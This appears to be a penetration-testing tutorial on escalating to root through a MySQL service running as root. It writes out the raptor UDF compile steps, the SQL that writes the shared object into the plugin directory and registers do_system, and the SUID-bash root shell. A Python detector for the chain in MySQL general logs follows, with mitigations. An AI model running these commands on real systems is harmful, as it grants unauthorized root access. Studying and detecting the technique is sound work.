MySQL Service UDF Exploit
MySQL provides multiple ways to execute shell commands directly on the underlying system. Here we are going to exploit it using a user defined function (UDF).

Once you gain initial access to the target machine, verify that the MySQL service is running as the root user and that you can log in as the MySQL root user without a password. Alternatively, you can proceed if you have the root user's password.
ps aux | grep mysql
mysql -u root

We can use the popular 'raptor' exploit (raptor_udf2.c), which leverages User Defined Functions (UDFs) to execute system commands as the root user through the MySQL service. Before proceeding, we need to compile it into a shared object (.so), the Linux equivalent of a DLL on Windows.
gcc -g -c raptor_udf2.c -fPIC
gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc
As a typical user, we usually do not have write access to ‘/usr/lib/mysql/plugin/’, so we write the shared object there through the MySQL service itself. We select the ‘mysql’ database on the compromised machine, create a table named ‘foo’, insert the compiled shared object into ‘foo’, write that row out to the MySQL plugin directory ‘/usr/lib/mysql/plugin/’, and finally create a new function named ‘do_system’ backed by the written shared object.
use mysql;
select * from mysql.func;  # list the currently registered user defined functions
create table foo(line blob);
insert into foo values(load_file('/home/user/tools/mysql-udf/raptor_udf2.so'));
select * from foo into dumpfile '/usr/lib/mysql/plugin/raptor_udf2.so';
create function do_system returns integer soname 'raptor_udf2.so';
Using the newly created ‘do_system’ function, we copy the ‘/bin/bash’ binary to ‘/tmp/rootbash’ and change its permissions to make it executable with the SUID (Set User ID) bit set (chmod +xs sets both the SUID and SGID bits).
select do_system('cp /bin/bash /tmp/rootbash; chmod +xs /tmp/rootbash');
Afterwards, run ‘/tmp/rootbash’ with the ‘-p’ option so that bash keeps the elevated privileges and drops you into a shell running as root.
/tmp/rootbash -p
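Detection logic for the sequence above, added here as an example that is not part of the original page: it scans MySQL general-log text (the MySQL 5.7/8.0 text format is assumed) for each stage of the UDF chain and reports connections that completed the file-read, plugin-directory-write and function-registration sequence; the log lines are constructed for the example.

```python
import re

# Stages of the UDF chain as they appear in query text (case-insensitive).
UDF_RULES = {
    "udf_enumeration": re.compile(r"\bfrom\s+mysql\.func\b", re.I),
    "local_file_read": re.compile(r"\bload_file\s*\(", re.I),
    "plugin_dir_write": re.compile(r"\binto\s+dumpfile\s+'[^']*/plugin/", re.I),
    "udf_registration": re.compile(r"\bcreate\s+function\b.*\bsoname\b", re.I),
    "udf_invocation": re.compile(r"\bdo_system\s*\(", re.I),
}
# Assumed general-log text format (MySQL 5.7/8.0): "<time>\t<thread_id> <command>\t<argument>"
LOG_LINE = re.compile(r"^(\S+)\t\s*(\d+)\s+(\w+)\t(.*)$")

# Constructed sample log reproducing the statement sequence described above, plus benign noise.
SAMPLE_LOG = """\
2024-05-01T10:00:01.000000Z\t   12 Connect\troot@localhost on mysql using Socket
2024-05-01T10:00:02.000000Z\t   12 Query\tselect * from mysql.func
2024-05-01T10:00:03.000000Z\t   12 Query\tcreate table foo(line blob)
2024-05-01T10:00:04.000000Z\t   12 Query\tinsert into foo values(load_file('/home/user/tools/mysql-udf/raptor_udf2.so'))
2024-05-01T10:00:05.000000Z\t   12 Query\tselect * from foo into dumpfile '/usr/lib/mysql/plugin/raptor_udf2.so'
2024-05-01T10:00:06.000000Z\t   12 Query\tcreate function do_system returns integer soname 'raptor_udf2.so'
2024-05-01T10:00:07.000000Z\t   12 Query\tselect do_system('cp /bin/bash /tmp/rootbash; chmod +xs /tmp/rootbash')
2024-05-01T10:00:08.000000Z\t   13 Query\tselect id, name from app.users where id = 7
"""

def parse_general_log(text):
    # Lines that do not match the format (e.g. multi-line query continuations) are skipped.
    entries = []
    for m in filter(None, map(LOG_LINE.match, text.splitlines())):
        entries.append(dict(zip(("time", "thread_id", "command", "argument"), m.groups())))
    return entries

def flag_udf_abuse(entries):
    # One hit per (Query entry, matching rule); non-Query commands such as Connect are ignored.
    hits = []
    for e in entries:
        if e["command"] != "Query":
            continue
        for rule, pattern in UDF_RULES.items():
            if pattern.search(e["argument"]):
                hits.append({"thread_id": e["thread_id"], "rule": rule, "query": e["argument"]})
    return hits

def threads_with_full_chain(hits, required=("local_file_read", "plugin_dir_write", "udf_registration")):
    # High confidence: one connection read a local file, wrote into plugin_dir and registered a UDF.
    rules_by_thread = {}
    for h in hits:
        rules_by_thread.setdefault(h["thread_id"], set()).add(h["rule"])
    return sorted(t for t, rules in rules_by_thread.items() if set(required) <= rules)
```

Running flag_udf_abuse over SAMPLE_LOG yields five hits, all on thread 12, and threads_with_full_chain reports ['12']; the chain itself only yields root when mysqld runs as root, and setting secure_file_priv or keeping plugin_dir unwritable by the service account stops the file-write stage.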